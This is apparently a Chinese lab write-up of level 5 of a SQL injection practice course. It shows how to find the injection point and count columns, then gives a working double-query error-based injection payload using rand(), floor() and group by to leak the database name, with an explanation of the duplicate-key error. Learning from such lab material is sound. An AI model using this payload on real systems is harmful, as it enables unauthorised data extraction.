第5关
输入?id=1
以前四关的思路
单引号报错,双单引号正常,证明存在注入点
order by 3-- - 正常 order by 4-- - 报错,字段数为3
再用select 1, 2, 3 发现无回显点
所以第五关得用到报错注入
根据标题可以用到双重查询
?id=1’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a-- -
rand() 生成[0,1)的随机数
floor() 向下取整
count(*) 统计
a 别名
大致的原理流程是:
rand()*2将[0,1)的随机数乘2变为[0,2)的随机数,再通过floor()向下取整改为0或1
group by会使数据库建立一个虚拟表并将这些0或1录入,同时将重复的内容归类成了两类,并作为主键, count(*)则对他们进行计数。
在记录数据时,会查询虚拟表中是否存在该主键,若不存在则插入。
因为插入时的结果可能有同样的值,这将导致主键冲突从而引发报错。
因为是随机数,所以导致了有时报错有时正常的情况。